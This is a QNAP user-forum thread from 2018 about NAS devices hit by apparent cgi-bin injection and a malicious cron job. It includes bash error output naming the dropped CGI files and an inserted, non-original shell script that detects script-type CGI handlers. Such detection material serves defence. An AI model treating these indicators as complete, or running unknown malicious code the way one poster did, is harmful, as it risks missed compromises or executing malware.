Re: Strange folders and cronjobs

Post by Trexx » Thu Sep 13, 2018 12:59 am

Don wrote:Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.

Some tips/advice.

  1. All systems (Windows, Linux, Apple, QNAP, Synology, etc) are vulnerable to attack if you open them up to the internet.
  2. Run Malware remover on your NAS and schedule runs.
  3. Run McAfee on your NAS for additional protection.
  4. Run virus software on your PCs.
  5. Use a VPN instead of opening incoming ports on the router.
  6. Make frequent backups for protection.


That sounds like a lot of work, reading, and educating myself on many things.... simpler path.. blame vendor for my choices. :wink:
Paul

Model: TS-877-1600 FW: 4.4.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x 500GB Evo 860
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
GPU: EVGA GTX 1060 6GB
UPS: CP AVR1350

Model:TVS-673 32GB FW: 4.4.3.x Test/Backup Box
Model:TS-228a FW: 4.4.3.x Test/Backup Box
-----------------------------------------------------------------------------------------------------------------------------------------
NAS RAID Rebuild Times | Live QTS Videos | | QNAP NAS Guide | Information needed when you ask for HELP | QNAP Links, Tutorials, etc.
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:02 am

Don wrote:Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.


That's the mitigation, sure. But anyway, QNAP did deliver insecure applications to its users. If they want to deliver so many features, and they promote this stuff, they should take care. Quite simple.

Since QNAP is not acting quickly and transparently here, I suggest we go public via Twitter and let the world know. (Good post on this: https://www.troyhunt.com/the-effectiven ... -security/)

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:04 am

GuyLerome wrote:I got hit by this as well, on the same date. Needless to say I'm not impressed with QNAP at all.

But I suffered from another hack back in May, possibly same vector (cgi-bin injection).

I have some files if anyone is interested, I'd be interested to have the following unscrambled (it was running as a crontab task):


I went over to https://www.tutorialspoint.com/execute_bash_online.php and pasted the code in; this is the output:

Code:

bash: line 2: /home/httpd/cgi-bin/syslog.cgi: No such file or directory
chmod: cannot access '/home/httpd/cgi-bin/syslog.cgi': No such file or directory
main.sh: line 77: warning: here-document at line 60 delimited by end-of-file (wanted `suwVACZYaJDrk')
main.sh: line 60: /home/httpd/cgi-bin/iscsitargetsetting.cgi: No such file or directory


Good, this at least gives some idea of what the hack tries to do.
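The run above shows what the cron job does when the paths exist: it writes shell scripts into the web server's cgi-bin as syslog.cgi and iscsitargetsetting.cgi and makes them executable with chmod 755. A CGI handler that is a shell script rather than a compiled binary is something an owner can check for directly, so here is an added triage script for that (not code from the thread, from the poster or from QNAP). It classifies each *.cgi by its first bytes and lists the ones that are "#!" scripts together with their interpreter line and whether the executable bit is set; the cgi-bin path is passed in as an argument and the sample directory in the usage is constructed. POSIX sh, so it works under BusyBox.

```shell
#!/bin/sh
# Added example, not from the thread: find CGI entries that are shell scripts
# (as the decoded cron job drops) instead of compiled binaries.

# classify_cgi FILE -> script | elf | other, decided from the first bytes:
#   "#!"     an interpreter script
#   0x7f ELF a compiled binary (the first byte is dropped via tail, the
#            remaining three are the printable "ELF")
classify_cgi() {
    if [ "$(head -c 2 "$1")" = '#!' ]; then
        echo script
    elif [ "$(head -c 4 "$1" | tail -c 3)" = ELF ]; then
        echo elf
    else
        echo other
    fi
}

# script_cgis DIR
# One sorted line per *.cgi that is a script:
#   <name> <x if executable, else -> <interpreter line without the "#!">
script_cgis() {
    for f in "$1"/*.cgi; do
        [ -f "$f" ] || continue               # unexpanded glob or non-file
        [ "$(classify_cgi "$f")" = script ] || continue
        if [ -x "$f" ]; then x=x; else x=-; fi
        printf '%s\t%s\t%s\n' "${f##*/}" "$x" "$(head -n 1 "$f" | cut -c3-)"
    done | sort
}

# count_script_cgis DIR -> number of script-type CGI entries found
count_script_cgis() {
    script_cgis "$1" | grep -c . || true
}

# Usage: sh cgi_triage.sh /home/httpd/cgi-bin (path from the decoded output;
# adjust for your system). With no argument nothing is printed.
if [ $# -gt 0 ]; then
    script_cgis "$1"
fi
```

Any hit is worth comparing against the same directory on a freshly installed system of the same firmware: a vendor-shipped wrapper script is plausible, but a script whose name matches the two the cron job writes, with a recent mtime, is the indicator this thread is about.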

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Thu Sep 13, 2018 1:07 am


Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Thu Sep 13, 2018 2:17 am

Why such vengeance? Are you going to warn the world about every vulnerability in every software product? I think you should since you feel so strongly that they need to be fixed immediately.
